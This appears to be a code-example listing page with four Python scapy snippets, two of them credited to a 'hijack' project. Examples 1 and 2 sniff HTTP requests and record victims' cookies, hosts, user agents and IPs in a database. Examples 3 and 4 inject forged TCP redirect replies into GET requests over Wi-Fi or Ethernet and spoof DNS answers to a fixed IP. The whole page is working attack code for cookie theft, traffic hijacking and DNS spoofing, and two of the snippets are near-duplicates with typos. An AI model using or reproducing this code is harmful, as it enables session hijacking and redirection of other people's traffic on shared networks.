示例#1
0
def process(pkt):
    if pkt.haslayer(TCP):
        if pkt.haslayer(Raw):
            tcpdata = pkt.getlayer(Raw).load
            if tcpdata.startswith("POST ") or tcpdata.startswith("GET "):
                ether_src = 'None_observed'
                if (pkt.haslayer(Ether)):
                    ether_src = pkt.getlayer(Ether).src
                cookie = helper.getcookie(tcpdata)
                host = helper.gethost(tcpdata)
                useragent = helper.getuseragent(tcpdata)
                address = helper.getdsturl(tcpdata)
                ip_src = pkt.getlayer(IP).src

                if cookie != None:
                    cookie = ''.join(cookie)
                else:
                    cookie = ''
                if host != None:
                    host = ''.join(host)
                else:
                    host = ''
                if useragent != None:
                    useragent = ''.join(useragent)
                else:
                    useragnet = ''

                if address != None:
                    address = ''.join(address)
                else:
                    address = ''

                if cookie != '':
                    cookies = cookie.split(';')
                    for name_val in cookies:
                        eq = name_val.find('=')
                        name = name_val[0:eq].strip()
                        val = name_val[eq + 1:].strip()

                    db_insert(ether_src, host, name, val, address, useragent,
                              ip_src)
示例#2
0
def process(pkt):
	if pkt.haslayer(TCP):
		if pkt.haslayer(Raw):
			tcpdata = pkt.getlayer(Raw).load
			if tcpdata.startswith("POST ") or tcpdata.startswith("GET "):
				ether_src='None_observed'
				if(pkt.haslayer(Ether)):
					ether_src=pkt.getlayer(Ether).src
				cookie=helper.getcookie(tcpdata)
				host=helper.gethost(tcpdata)
				useragent=helper.getuseragent(tcpdata)
				address=helper.getdsturl(tcpdata)
				ip_src=pkt.getlayer(IP).src
				
				if cookie != None:
					cookie=''.join(cookie)
				else:
					cookie=''
				if host != None:
					host=''.join(host)
				else:
					host=''
				if useragent != None:
					useragent=''.join(useragent)
				else:
					useragnet=''

				if address != None:
					address=''.join(address)
				else:
					address=''


				if cookie != '':	
					cookies = cookie.split(';')
        				for name_val in cookies:
                				eq = name_val.find('=')
                				name = name_val[0:eq].strip()
                				val = name_val[eq+1:].strip()

						db_insert(ether_src,host,name,val,address,useragent,ip_src)
示例#3
0
def pkt_callback(pkt):

    if pkt.haslayer(scapy.Dot11):
        #print("got Wifi packet")
        # construct fake l2 for wifi packet
        macl = pkt.getlayer(scapy.Dot11)
        l2 = scapy.RadioTap() / scapy.Dot11(
            addr1=macl.addr2,
            addr2=macl.addr1,
            addr3=macl.addr3,
            FCfield="from-DS") / scapy.LLC(ctrl=3) / scapy.SNAP()
    elif pkt.haslayer(scapy.Ether):
        #print("got Ethernet packet")
        # construct fake l2 for ethernet packet
        macl = pkt.getlayer(scapy.Ether)
        l2 = scapy.Ether(dst=macl.src, src=macl.dst)
    else:
        print("protocol neither ethernet nor wifi, skipping")
        return

    if pkt.haslayer(scapy.IP):
        # construct fake l3
        ipl = pkt.getlayer(scapy.IP)
        l3 = scapy.IP(src=ipl.dst, dst=ipl.src)
    else:
        #print("this is not IP packet, skipping")
        return

    if pkt.haslayer(scapy.TCP):
        #print("we have TCP packet")
        # construct fake layer 4 for TCP
        tcpl = pkt.getlayer(scapy.TCP)
        l4 = scapy.TCP(dport=tcpl.sport, sport=tcpl.dport)

        if tcpl.flags == 2:  # syn
            return
        elif tcpl.flags == 24 or tcpl.flags == 16:  # psh ack
            if pkt.haslayer(scapy.Raw):
                #print("packet has some data")
                tcpdata = pkt.getlayer(scapy.Raw).load
                if tcpdata.startswith("GET "):
                    #print("TCP data starts with GET")

                    dsturl = helper.getdsturl(tcpdata)

                    if dsturl is None:
                        return

                    print("IP: %s, DST URL: %s" %
                          (pkt.getlayer(scapy.IP).src, dsturl))

                    if dsturl.find('0x0a') != -1 or dsturl.find(
                            '85.17') != -1 or dsturl.find(
                                'twitter') != -1 or dsturl.find(
                                    'facebook') != -1 or dsturl.find(
                                        'vk.com') != -1 or dsturl.find(
                                            'blogger') != -1 or dsturl.find(
                                                'odnoklassniki') != -1:
                        print "inject success"
                        return

                    #credirpkt = redirpkt % {'url': "http://0x0a.net/" }
                    credirpkt = redirpkt

                    # construct reply packet
                    pktreply = l2 / l3 / l4
                    pktreply.getlayer(scapy.TCP).seq = tcpl.ack
                    pktreply.getlayer(scapy.TCP).ack = tcpl.seq + len(tcpdata)
                    pktreply.getlayer(scapy.TCP).flags = "PA"

                    # construct fin packet
                    finpktreply = pktreply.copy()
                    finpktreply.getlayer(scapy.TCP).flags = "FA"
                    finpktreply.getlayer(scapy.TCP).seq += len(credirpkt)

                    # add redir payload to reply packet
                    pktreply.getlayer(scapy.TCP).add_payload(credirpkt)

                    packetbasket = [pktreply, finpktreply]

                    # send reply packet
                    scapy.sendp(packetbasket, verbose=0, iface=interface)
                    print("Reply sent")
            return

        elif tcpl.flags == 17:  # fin ack
            return

    elif pkt.haslayer(scapy.UDP):
        # construct layer 4 for UDP
        udpl = pkt.getlayer(scapy.UDP)
        l4 = scapy.UDP(dport=udpl.sport, sport=udpl.dport)

        if pkt.haslayer(scapy.DNS):
            #print("We got DNS packet")
            dnsl = pkt.getlayer(scapy.DNS)
            if dnsl.qr == 0:
                print("We got DNS request packet: %s" % (dnsl.qd.qname))

                pktreply = l2 / l3 / l4 / scapy.DNS(
                    id=dnsl.id,
                    qr=1,
                    qd=dnsl.qd,
                    an=scapy.DNSRR(
                        rrname=dnsl.qd.qname, ttl=10, rdata="85.17.93.121"))
                scapy.sendp([pktreply], verbose=0, iface=interface)
                print("Reply sent")
        return

    else:
        print("protocol not TCP or UDP, skipping")
        #pkt.show()
        return
示例#4
0
文件: hijack.py 项目: 0x0d/hijack
def pkt_callback(pkt):

    if pkt.haslayer(scapy.Dot11):
        #print("got Wifi packet")
        # construct fake l2 for wifi packet
        macl = pkt.getlayer(scapy.Dot11)
        l2 = scapy.RadioTap() / scapy.Dot11(addr1 = macl.addr2, addr2 = macl.addr1, addr3 = macl.addr3, FCfield="from-DS") / scapy.LLC(ctrl=3) / scapy.SNAP()
    elif pkt.haslayer(scapy.Ether):
        #print("got Ethernet packet")
        # construct fake l2 for ethernet packet
        macl = pkt.getlayer(scapy.Ether)
        l2 = scapy.Ether(dst = macl.src, src = macl.dst)
    else:
        print("protocol neither ethernet nor wifi, skipping")
        return

    if pkt.haslayer(scapy.IP):
        # construct fake l3
        ipl = pkt.getlayer(scapy.IP)
        l3 = scapy.IP(src = ipl.dst, dst = ipl.src)
    else:
        #print("this is not IP packet, skipping")
        return

    if pkt.haslayer(scapy.TCP):
        #print("we have TCP packet")
        # construct fake layer 4 for TCP
        tcpl = pkt.getlayer(scapy.TCP)
        l4 = scapy.TCP(dport = tcpl.sport, sport = tcpl.dport)

        if tcpl.flags == 2: # syn
            return
        elif tcpl.flags == 24 or tcpl.flags == 16: # psh ack
            if pkt.haslayer(scapy.Raw):
                #print("packet has some data")
                tcpdata = pkt.getlayer(scapy.Raw).load
                if tcpdata.startswith("GET "):
                    #print("TCP data starts with GET")

                    dsturl = helper.getdsturl(tcpdata)

                    if dsturl is None:
                        return
                    
                    print("IP: %s, DST URL: %s" % (pkt.getlayer(scapy.IP).src, dsturl))

                    if dsturl.find('0x0a') != -1 or dsturl.find('85.17') != -1 or dsturl.find('twitter') != -1 or dsturl.find('facebook') != -1 or dsturl.find('vk.com') != -1 or dsturl.find('blogger') != -1 or dsturl.find('odnoklassniki') != -1:
                        print "inject success"
                        return

                    #credirpkt = redirpkt % {'url': "http://0x0a.net/" }
                    credirpkt = redirpkt

                    # construct reply packet
                    pktreply = l2 / l3 / l4
                    pktreply.getlayer(scapy.TCP).seq = tcpl.ack
                    pktreply.getlayer(scapy.TCP).ack = tcpl.seq + len(tcpdata)
                    pktreply.getlayer(scapy.TCP).flags = "PA"

                    # construct fin packet
                    finpktreply = pktreply.copy()
                    finpktreply.getlayer(scapy.TCP).flags = "FA"
                    finpktreply.getlayer(scapy.TCP).seq += len(credirpkt)

                    # add redir payload to reply packet
                    pktreply.getlayer(scapy.TCP).add_payload(credirpkt)

                    packetbasket = [pktreply, finpktreply]

                    # send reply packet
                    scapy.sendp(packetbasket, verbose = 0, iface = interface)
                    print("Reply sent")
            return

        elif tcpl.flags == 17: # fin ack
            return

    elif pkt.haslayer(scapy.UDP):
        # construct layer 4 for UDP
        udpl = pkt.getlayer(scapy.UDP)
        l4 = scapy.UDP(dport=udpl.sport, sport=udpl.dport)

        if pkt.haslayer(scapy.DNS):
            #print("We got DNS packet")
            dnsl = pkt.getlayer(scapy.DNS)
            if dnsl.qr == 0:
                print("We got DNS request packet: %s" % (dnsl.qd.qname))

                pktreply = l2 / l3 / l4 / scapy.DNS(id=dnsl.id, qr=1, qd=dnsl.qd, an=scapy.DNSRR(rrname=dnsl.qd.qname, ttl = 10, rdata="85.17.93.121"))
                scapy.sendp([pktreply], verbose = 0, iface = interface)
                print("Reply sent")
        return

    else:
        print("protocol not TCP or UDP, skipping")
        #pkt.show()
        return